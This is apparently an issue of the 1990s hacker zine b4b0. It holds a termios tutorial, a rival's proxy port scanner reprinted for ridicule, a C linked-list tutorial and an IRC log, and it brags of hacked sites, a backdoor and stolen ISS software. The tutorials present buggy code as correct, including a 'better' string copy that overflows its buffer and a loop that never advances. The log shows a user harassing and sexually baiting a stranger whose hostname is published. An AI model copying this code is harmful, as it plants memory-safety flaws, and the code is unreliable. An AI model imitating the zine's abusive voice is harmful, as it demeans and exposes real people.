,d$$$ `$$Ss. .s` $$$ $$$S$$$ sS$$ $Ss. `$$S$. .$' $$$ $$$$$$' .$$S' `S$S. $$$$ .$' $$$ $$$$$' .S$$' `S$S. $$$$' .d$' $$$ $$$$' $$$$ $$$$ $$$$ .$S' $$$ $$$$ $$$$ $$$$ $$$$$SSSSSss. .S$S' .$$$ $$$$$s. $$$$ $$$$ $$$$$"~ `$Ss.`S$$ d$$$. $$$$S'~`~S$$Ss.$$$$ $$$$ $$$$' `$$Ss. $s. .dS$$$$s.`~ "S$$Ss.$$ $$$$ $$$$ $$$$$ $$$$$$$$$$$$$$$$$ `$$$$$s$ $$$$ $$$$ $$$$$ `S$$$$' ssss $$$$$$ $$$$ $$$$ $$$$' `$$$ $$$$ $$$$$$ $$$$ $$$$. $$$' $$$ $$$$ $$$$$$ $$$$ $$$$$b. .,sS$' $$$ $$$$ $$$$'$. .$S$' `S$$$$$SsS$$$$$' d$$$ $$$$$Ss. .sS$$$$'$SS. .SS$' d$$$$ `S$$$$$SsS$$$$"` `S$$ $$S' .d$$$$$ `$$$$$' `~~~ s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x [ don't even try to cramp our style. bitch. ] s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x 6 s!x (y0u thought we w0uldn't, we c0uldn't. *nOW THEN*, BITCH.) editor of this issue )----------------------------> jorge editor of last issue )--------- -------- ---------> Qytpo QUIT )----------------------------> jsbach )-------- ---------- --------> Qytpo )-------- --------> Volatile ------------------------------ staff grey0p )--------------------------------------> gr1p jAh0rGe )--- --------- --- ------ ---> jorge aaszEm )--- -------- --- ------ --- ---> assem tEEp )--- ------- - --- ------ --- ---> tip kArAck )--- - -- --- - --- ---> chrak rAhAlf )--- --- - - --- - --- ---> r4lph sehgvEE )--- --- ----- --- --- - --- ---> segv mihLk )--- ----- --- - ---> m1lk man 0hdaye )--------------------------------------> ohday g4ry nU )--- ------- ------ ------ ------ -----> gary gnu j4hy )--------------------------------------> j\ b4b0 Official Linux command of the month ------> setfont sc.fnt b4b0 Official site of the month )--------------> linuxwww.db.erau.edu/LPG b4b0 Official Idiot the Month )--------------> bronc buster warriorised )----------------------------------> www.antionline.com fun )-----------------------------> fadetoblack.com/namegenerator more fun )-----------------------------> taunting inmates while on a prison tour interesting )-----------------------------> reading b4b0! dull )-----------------------------> sektorgrl :/ gay )-----------------------------> purple teletubbie comedy )-----------------------------> so1o applied to ISS and sent them a list of sites he hacked "I got in trouble thanks to b4b0.." "Oh ? How's that?" "Well, i was in class on a computer, and i went to www.b4b0.org. When it loaded, the shit said 'bitch ill fuck yo ass up' and the speakers were on high. " [ table of contents ] [1]==[ Editor's werdz ] [ jorge ]==[1] [2]==[ Termios library ] [ assem ]==[2] [3]==[ Bronc Buster Elite ] [ jnz ]==[3] [4]==[ OOP in C ] [ lore ]==[4] [5]==[ Logs ] [ b4b0 ]==[5] [6]==[ Idiot of the Month ] [ b4b0 ]==[6] [7]==[ Tampax Dox ] [ Gary Gnu ]==[7] [8]==[ EINS and the z39.50 Protocol Suite ] [ gr1p ]==[8] [9]==[ Intro to *BSD Socket Layer Internals ] [ jayenz ]==[9] [10]=[ Dumbest Shit Ever ] [ ResiD ]=[10] [11]=[ b4b0 Advisory ] [ b4b0 ]=[11] [12]=[ !! ISS Company Secret Warez !! ] [ * ]=[12] [13]=[ ripping skills elite (phusnttt.c) ] [ phusnkin ]=[13] [14]=[ hackphreak .history files ] [ mod ]=[14] [15]=[ message queues ] [ Canul ]=[15] [16]=[ el8 Morpheus warez #hacking elitez ] [ b4b0 ]=[16] [17]=[ b4b0 linux x86 asm codez ] [ chrak ]=[17] [18]=[ Idiocy on Dialouts / Dialout Info ] [ jorge ]=[18] [ Other stuff in this issue of b4b0 ] warez/pr0n.html - uNF uNF warez/server.c - gummo back door (? ph1xs creation) warez/gjp.tar - Gay Juarez Project (dumb warez) warez/qps.gz - KKRs scanner warez/jester.tar.gz - neat. take a look at it. Team QOS's work. (verbal) warez/selling.out - HomeySan wrote this. Read it. Fear. . . . "What's the point of a government when they want to govern me?" -- Pennywise !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 1 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Editors Words. Hi. We've had some rough times in b4b0. Lotza people quitting due to lack of this and that, because he or she, whatever. No matter we stick-and-move and continue on. Thiz issue seriously kicks ass. We've got everything from stolen iss warez, to tampax dox. so1o might even have a 'guest appearence' h0h. fear. anyways. Enjoy. --jorge !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 2 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 TERMINAL I/O LIBRARY assem [ SEE termios.tgz ] The termios library is a POSIX compatible frontend for otherwise, unportable ioctl() calls. In the late 1970's, System III developed a different set of terminal routines from Version 7. System V continued to hold these same System III routines while Berkeley systems used the Version 7 routines. This article is an introduction to the termio library and some of the aspects and resources you can use with it. Terminal I/O consists of two modes: 1. Canonical mode -> line processing, read() reads at most one line per call. 2. Noncanonical mode -> data is not assembled into lines. If you have ever tinkered with some programming and input requests I'm sure you have noticed that your fgets() and scanf("%s", buffer); reads a line with \n\0 trailing the data. This is canonical mode. You also may have heard of getch() which uses noncanonical mode, reads() one character per call. Let's draw a couple of conclusions... since all of the read requests you call that read from stdin (standard input) are canonical based, and only getch() appears to be noncanonical, wouldn't you assume canonical is default? Yes, it is. The text editor I am writing this article in (emacs), at the touch of my fingertips to the keyboard I see the key I stroked appear on my screen. I haven't hit carriage return yet, therefore, wouldn't emacs be noncanonical based? Yes, it is, and so are most (if not all) text editors. That wasn't too hard, was it? Let's get down to the termios functions. NOTE: This article probably won't be advantagous to you unless you are looking for examples of termios code to play with or you are a complete moron. This is basically manual (man) pages with slightly more comprehensible language (or maybe not?). #include struct termios { tcflag_t c_iflag; /* input flags */ tcflag_t c_oflag; /* output flags */ tcflag_t c_cflag; /* control flags */ tcflag_t c_lflag; /* local flags */ cc_t c_cc[NCCS]; /* control characters */ }; speed_t cfgetispeed(const struct termios *term); speed_t cfgetospeed(const struct termios *term); int cfsetispeed(struct termios *term, speed_t speed); int cfsetospeed(struct termios *term, speed_t speed); int tcdrain(int fd); int tcflow(int fd, int action); int tcflush(int fd, int queue); int tcgetattr(int fd, struct termios *term); int tcsendbreak(int fd, int duration); int tcsetattr(int fd, int opt, const struct termios *term); Hey not too much, eh? Let's take a look at the members of the termios structure and the flags that are behind it. *** NOTE *** These the the POSIX.1 flags only! struct termios { tcflag_t c_iflag; BRKINT generate SIGINT on BREAK ICRNL map CR (carriage) to NL on input IGNBRK ignore BREAK IGNCR ignore CR IGNPAR ignore characters with parity errors INLCR map NL to CR on input INPCK enable input parity checking ISTRIP strip eighth bit off input characters IXOFF enable start/stop input flow control IXON enable start/stop output flow control PARMRK mark parity errors tcflag_t c_oflag; ONOEOT discard EOTs on output (^D) tcflag_t c_cflag; CLOCAL ignore modem status lines CREAD enable receiver CSIZE character size mask CSTOPB send two stop bits, else one HUPCL hangup on last close PARENB parity enable PARODD odd parity, else even tcflag_t c_lflag; ECHO enable echo ECHOE visually erase characters ECHOK echo kill ECHONL echo NL ICANON canonical input IEXTEN enable extended input character processing ISIG enable terminal-generated signals NOFLSH disable flush after interrupt or quit TOSTOP send SIGTTOU for background output cc_t c_cc[NCS]; CR carriage return \r (can not change) EOF end of file EOL end of line ERASE backspace ^H INTR interrupt, SIGINT ^C KILL delete line ^U NL linefeed \n (can not change) QUIT quit ^\ START resume output ^Q STOP stop output ^S SUSP suspend ^Z *** NOTE *** By inserting a 'V' in front of the before mentioned control characters (i.e. VEOF) you have the subscript you use to reference and change the control character values... example: term.c_cc[VEOF] = 1; }; Alright, now that we've gone over the various flags and control characters let's play with the terminal settings. tcgetattr() and tcsetattr() are the get terminal and set terminal attributes calls. Let's review the calls real quick first. int tcgetattr(int fd, struct termios *term); int tcsetattr(int fd, int opt, struct termios *term); opt is specified as one of the following: TCSANOW - Change occurs immediately. TCSADRAIN - Change occurs after all output has been transmitted. Use if you are changing the c_oflag parameters. TCSAFLUSH - Occurs after all output has been transmitted. When change takes place all input in the queue that is un-read is flushed. Both return 0 if successful, -1 on failure. Here is an example of dos and curses's library routine, getch(). (see getch.c) Now, let's review the library... int tcgetattr ( int fd, struct termios *termios_p ); tcgetattr () fills the ptr to the termios structure using the object associated with fd. EXAMPLE: struct termios term; if (tcgetattr(fileno(stdin), &term) < 0) die("tcgetattr broke!"); int tcsetattr ( int fd, int optional_actions, struct termios *termios_p ); tcsetattr () uses the information stored in the ptr to termios to set the terminal characteristics of the object associated with fd. EXAMPLE: struct termios term; if (tcgetattr(fileno(stdin), &term) < 0) die("tcgetattr failed!"); term.c_cc[VINTR] = 7; /* interrupt control character becomes ^G */ if (tcsetattr(fileno(stdin), TCSANOW, &term) < 0) die("tcsetattr failed!"); int tcsendbreak ( int fd, int duration ); tcsendbreak () generates a BREAK to the object associated with the descriptor for duration. int tcdrain ( int fd ); tcdrain () waits until all output written to fd has been transmitted. EXAMPLE: #define flush(x) tcdrain(x) flush(fileno(stdout)); int tcflush ( int fd, int queue_selector ); discards data written but not transmitted or data received but not read, depending on queue_selector. queue_selector can be set to these values: TCIFLUSH - flushes data received but not read. TCOFLUSH - flushes data written but not transmitted. TCIOFLUSH - TCIFLUSH and TCOFLUSH EXAMPLE: tcflush(fileno(stdout), TCIOFLUSH); int tcflow ( int fd, int action ); tcflow () stops or resumes transmission or reception of data to and from the system. EXAMPLE: extern char sLock = 0; void scroll_lock() { switch(sLock) { case '0': if (tcflow(fileno(stdout), TCOOFF) < 0) die("tcflow died!"); sLock = 1; break; case '1': if (tcflow(fileno(stdout), TCOON) < 0) die("tcflow died!"); sLock = 0; break; default: die("internal error!"); break; } } int cfmakeraw ( struct termios *termios_p ); cfmakeraw () sets the terminal attributes as follows: termios_p->c_iflag &= ~(IGNBRK|BRKINT|PARMRK|ISTRIP |INLCR|IGNCR|ICRNL|IXON); termios_p->c_oflag &= ~OPOST; termios_p->c_lflag &= ~(ECHO|ECHONL|ICANON|ISIG|IEXTEN); termios_p->c_cflag &= ~(CSIZE|PARENB); termios_p->c_cflag |= CS8; speed_t cfgetospeed ( struct termios *termios_p ); speed_t cfgetispeed ( struct termios *termios_p ); cfgetospeed () returns the output baud rate stored in the termios structure. cfgetispeed () return the input baud rate stored in the termios structure. EXAMPLE: tcgetattr(fileno(stdin), &termin); tcgetattr(fileno(stdout), &termout); printf("terminal baud rate..\ninput: %q\noutput: %q\n", cfgetispeed(&termin), cfgetospeed(&termout)); int cfsetospeed ( struct termios *termios_p, speed_t speed ); int cfsetispeed ( struct termios *termios_p, speed_t speed ); cfsetospeed () sets the terminal output baud rate. cfsetispeed () sets the terminal input baud rate. EXAMPLE: tcgetattr(fileno(stdin), &termin); tcgetattr(fileno(stdout), &termout); cfsetispeed(&term, B57600); cfsetospeed(&term, B57600); Included in the file I have compiled a few functions to set certain terminal modes and a few macros and functions to play with various of the before mentioned terminal modes. (see aterm.h) This article was written as a learning experience for myself and for others over the terminal input/output library, termios. Some of the code is untested and I am human so I am likely to have errors in my article, please email assem@hom.net with any errors you find and if you feel like it, a correction. - assem email: assem@hom.net web: http://weapons.org . . . if you think I am a moron go to www.hackphreak.org and read my lecture then say I am a moron joeshmoe: no, I do not code in C I only shell script umm, ever heard of .bat files? !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 3 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Bronc Busters elite Skills shown lore This code was given to me by module: /* * Web proxy port scanner v1.0 by bronc * to complie: gcc ppscan.c -o ppscan * to use: ./ppscan * If thoes two lines are to hard for you, you should not be using it.. * * Due to about 200 error messages, this doesnt compile * by br0nk, no wonder its hella broken. */ #include #include #include #include #include #include #include #define MAX 256 int main(int argc, char **argv[]) <--- char **argv[], good one bronc { int socks, start, stop, i; <--- don't bother zeroing anything struct hostent *bounce; <--- elite struct sockaddr_in proxey; char temp[MAX+1]; char buffer[MAX+1]; char connected[]=" Connection established "; char port[6]; char *target =argv[3]; printf("\nProxey Port Scanner v1.0"); printf("\nby Bronc Buster\n"); if(argc<5) exit(printf("Usage: %s ",argv[0])); /* get IP of proxey */ bounce=gethostbyname(argv[1]); if(!bounce) exit(printf("Domain lookup error")); proxey.sin_family=AF_INET; proxey.sin_addr.s_addr=*(long *)(bounce->h_addr); /* set ports to start and stop at */ start=atoi(argv[4]); stop=atoi(argv[5]); /* loop to scan our ports */ for(i=start;i<=stop;i++) { /* create socket */ bounce.sin_port=htons(atoi(argv[2])); socks=socket(AF_INET,SOCK_STREAM,0); if(socks<0) exit(printf("Socket error")); port=i; /* format the string we want to send */ strcpy(temp,"CONNECT: "); strcat(temp,target); <--- What if our target happens to be 258 bytes strcat(temp," "); long Bronc? strcat(temp,port); /* connect, send string and read back reply */ if(connect(socks,(struct sockaddr *)&proxey, sizeof(proxey))<0) exit(printf("Connection error")); write(socks,temp,strlen(temp)); <-- man send if(read(socks,buffer,sizeof(buffer))<0) <-- man recv exit(printf("Read error")); if(strcmp(buffer,connected)<=0) printf("\nPort: %i open",&i); /* close socket and loop back */ close(socks); } printf("\nScan finished"); return 0; } /* EOF */ . . . is there a netscape that I can use on a shell? I hate this lynx shit with no pictures !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 4 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 OOP programming in C lore -------------------------------------- Object Orientated Programming in C -------------------------------------- Part 1 OOP. The thing that makes C such a powerful language, and yet, quite a lot of C programmers (or people who think they are) don't even know what a structure is. They look at other people's code, and rip it without even a clue what it does. So here it is, for all of you who are interested, "How to handle objects within the C language." Linked-lists ------------ Linked-lists are extremely important and are used in every kernel, almost every daemon there is and probably even the text view you're using right now. A linked-list is created by using a pointer that points to the same structure within a structure. For example: typedef struct a_struct a_Struct; struct a_struct { int a_value; a_Struct * prev; a_Struct * next; }; With this, we can create a stack of objects. And we can add and remove objects from this stack, this method is much more cleaner than using an array like, say, a_Struct[100]. It is much more easy and efficent to remove elements using linked-lists. Consider this. We're writing an IRC client, and need a list to hold each and every server, to do this, we need not just the canonical name of the server, but it's ircd port too. So we could create a structure like this: typedef struct server Server; struct server { char * name; unsigned short port; Server * prev; Server * next; }; Then, we would need a two global pointers, one that points to the head of the list, and one that points to the bottom, and we must sure that functions manage these pointers properly. So: Server * serverhead = NULL; Server * servertail = NULL; Now, if we wish to add an element to the linked-list, we can weite something like this: int add_server(char * server_name, unsigned short server_port) { Server * new_server = NULL; /* Our new element on the stack */ /* Allocate memory for our element */ new_server = (Server *)malloc(sizeof(struct server)); /* And now we add the neccessary variables to the structure */ /* See below for copy */ copy(&new_server->name, server_name); new_server->port = server_port; new_server->prev = NULL; new_server->next = NULL; /* Now we check to if the head of top list exists */ if (!Serverhead) { /* There are currently no elements on the stack */ serverhead = new_server; servertail = new_server; } else { /* We add the new element onto the end of the stack */ servertail->next = new_server; new_server->prev = servertail; servertail = new_server } return (1); } /* Much better way of copying memory */ int copy(char * * str1, char * str2) { if (!*str1 || !str2) return (-1); *str1 = (char *)malloc(strlen(str2)); strcpy(*str1, str2); return (1); } There, we can add lots of servers to a list now. So do something like: int main(int argc, char * * argv) { Server * current_server = NULL; /* A pointer to the current server */ add_server("dallas.tx.us.undernet.org", 6667); add_server("mclean.va.us.undernet.org", 6667); add_server("los-angeles.ca.us.undernet.org", 6667); add_server("london.uk.eu.undernet.org", 6667); /* Make the current server point to the serverlist head, while the current server exists, do this, and at the end, goto the next server in the list */ for (current_server = serverhead; current_server; current_server = current_server) { fprintf(stdout, "%s:%d\n", current_server->name, current_server->port); } exit(1); } There. I think you see what I'm getting at now. If we want to remove an element from the list, do something like this: int remove_server(char * server_name) { Server * current_server = NULL; /* Locate the server */ for (current_server = serverhead; current_server; current_server = current_server->next) { if (strcmp(current_server->name, server_name) == 0) break; } /* The element doesn't exist on the list */ if (current_server == NULL) return (-1); /* We now remove the server */ if (current_server->next && current_server->prev) { /* Both previous and next elements exist, so we relink */ current_server->prev->next = current_server->next; current_server->next->prev = current_server->prev; free(current_server); } else if (current_server->next) { /* This element is the head of the list */ current_server->next->prev = Null; serverhead = current_server->next; free(current_server); } else if (current_server->prev) { /* This element is the tail of the list */ current_server->prev->next = Null; servertail = current_server->prev; free(current_server); } else { /* This element is the only member of the list */ serverhead = NULL; servertail = NULL; free(current_server); } return (1); } Linked-lists are very powerful, and can be used for anything. Their more complex counterpart, the Balanced Tree, will be discussed next issue. . . . hahaha, remember the time I pinged your router non-stop? .cRk. [Signoff/MostHateD(#hackphreak)] (Ping timeout) . . . !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 5 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Logs picking up an irc wh0re: [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i missed u last night, ur touch, your lips.. [msg(bobbie)] who the fuck are u? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sorry do I know u [msg(bobbie)] APPARENTLY NOT. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why did u message me? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] did I message u? [msg(bobbie)] [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i missed u last night, ur touch, your lips.. [msg(bobbie)] EXPLAIN THAT [msg(bobbie)] deluded fucker. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] I'm sorry, i thought ur my boyfriend [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sorry [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] he uses the same nick! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i apologize [msg(bobbie)] gibb0r me sib0r seckz [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats this? [msg(bobbie)] cheers [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why ar eu getting so mad? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u having a bad day? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] wow! u do have a big attitude problem [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i DID fucking say Im sorry OK??? [msg(bobbie)] shut your self-righteous yapping. good day. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] fuck u! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] asshole! [msg(bobbie)] oh, that was an excellent retort. [msg(bobbie)] the handy phrase, 'fuck u' works wonders. [msg(bobbie)] take care. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] asshooell! [msg(bobbie)] 'asshooell' [sic] ? [msg(bobbie)] ok. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] assshollle! [msg(bobbie)] cheers. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats ur problem [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont undersatdnm [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] why did u get SOOO upset? [msg(bobbie)] hmmm, look in the mirror. ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- - | bobbie (datasoftte@pool-207-205-160-121.nwrk.grid.net) (Internic Network) ³ ircname : ******* ³ server : irc.mindspring.com ([207.69.200.132] MindSpring Enterprises IRC Serve) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its intriguing [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] wherer iu at? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u a male or female [msg(bobbie)] hahaha, your attempts at subtle retortion fall short. [msg(bobbie)] your typos really spice up your messages. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what do u have on? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] thanks [msg(bobbie)] i have a sour face on. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] typing fast [msg(bobbie)] later. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u hard? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u havent cum for a while, have u? [msg(bobbie)] you are truly twisted. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] can u suck ur own cock? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] may be u should do that [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how old r u? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm curious [msg(bobbie)] only an idiot would ask that. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] I'm fuming [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm so mad! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how old r u? [msg(bobbie)] it's the mentality of beavis and butthead. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] male or female [msg(bobbie)] you're so mad and you ask me why i'm mad? [msg(bobbie)] ok. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] so how old r u? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] stud! [msg(bobbie)] what does it matter? [msg(bobbie)] typical irc question. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm curious [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i wanna know [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] please? [msg(bobbie)] i'm five years old. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no way! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] honest? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] LOL [msg(bobbie)] yes. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] pleas eplease please [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] tell me! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where r u at? [msg(bobbie)] what does it matter? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i said I wanna know, why ask so many questions [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] c'mon please [msg(bobbie)] i live in newark. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] new jersey [msg(bobbie)] check out the brains on bobbie! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :) [msg(bobbie)] i'll talk to you later. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u at work? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok so how old r u? [msg(bobbie)] why? u available for a quickie or something? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] um may be:) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u just playing with me or r u really that mad? I hope u r just playing:) [msg(bobbie)] whatever. [msg(bobbie)] it's entertaining, really. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok my name is alice i'm 26 [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] your turn:) [msg(bobbie)] so, u wanna give up the clam? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] lets start all over again:) [msg(bobbie)] ok. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] see Im smiling [msg(bobbie)] i'm phil, 5 years old, and my last name's mckraken. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r not five:) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] hi Phil [msg(bobbie)] so u available for a quickie? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i might b eif u tell me ur age [msg(bobbie)] don't u have a bf? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i'm single have a boyfriend [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] yes [msg(bobbie)] cool, i'll tag team with him for a threesome. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no:) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] see a 5 yr old doesnt talk like this [msg(bobbie)] i'm a horny 5 year old. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] will u please tell me how old r u? dont worry if u are old, cause I like older guys:) [msg(bobbie)] i'm 87. [msg(bobbie)] oh, and a half. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] c'mon!!!!!!!! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r driving me crazy! [msg(bobbie)] i thought you were mad? [msg(bobbie)] ok, like, i'm a 30something guy [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] honest? [msg(bobbie)] people call me RLoxley [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats that?> [msg(bobbie)] it's my skills to the bills. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont understand [msg(bobbie)] it's okay, that's expected. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] thanks [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u know how to put people down [msg(bobbie)] huh? you took that the wrong way. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no i didnt [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u haev been not nice with me from the start [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] and I dont know why [msg(bobbie)] what that meant was that noone gets it either, so i wasn't expecting you too [msg(bobbie)] er, to not too [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok [msg(bobbie)] hey, so like, do you have a picture or something? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] so are you married or have a girlfriend? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i dont have a picture [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] do you? [msg(bobbie)] i'm both married and have a gf. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u r kidding again [msg(bobbie)] my slut gf on the side is sktor grl [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its not fun anymore [msg(bobbie)] yes it is. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what do u have on now? [msg(bobbie)] i got like a thong and stuff on. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] liar! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats yor dick like? [msg(bobbie)] it's like most dicks [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] have u ever measured it? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] cut or uncut? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] how tall r u? [msg(bobbie)] it's cut [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] weight? [msg(bobbie)] like 6', 210 lbs [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] do u work out? [msg(bobbie)] sure. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] will u tell me something honestly now/ [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ? [msg(bobbie)] what? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] were u really that mad or u r just playing and if u were, why?:) [msg(bobbie)] any idiots who take irc that seriously need to be flogged. [msg(bobbie)] what do you think? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok Im feeling much better now:) [msg(bobbie)] so, u available for that quickie now? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] but u sound like a very practical guy [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] quickie?:) [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] ok! [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] whats ur favorite position? [msg(bobbie)] any. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] min eis doggie [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] r u married? [msg(bobbie)] why is it the doggie? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] its very erotic [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i think [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] and wild [msg(bobbie)] u like to be ridden i take it. [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] :) [msg(bobbie)] won't your bf mind if i took you for a ride? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] he wouldnt know [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] when did u have sex last? [msg(bobbie)] hmmm, last weekend. [msg(bobbie)] so like, are you a nympho? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] with who? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] no im not [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] what is a nympho? [bobbie(datasoftte@pool-207-205-160-121.nwrk.grid.net)] im sure its somthing bad [msg(bobbie)] you're not 26. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] u there 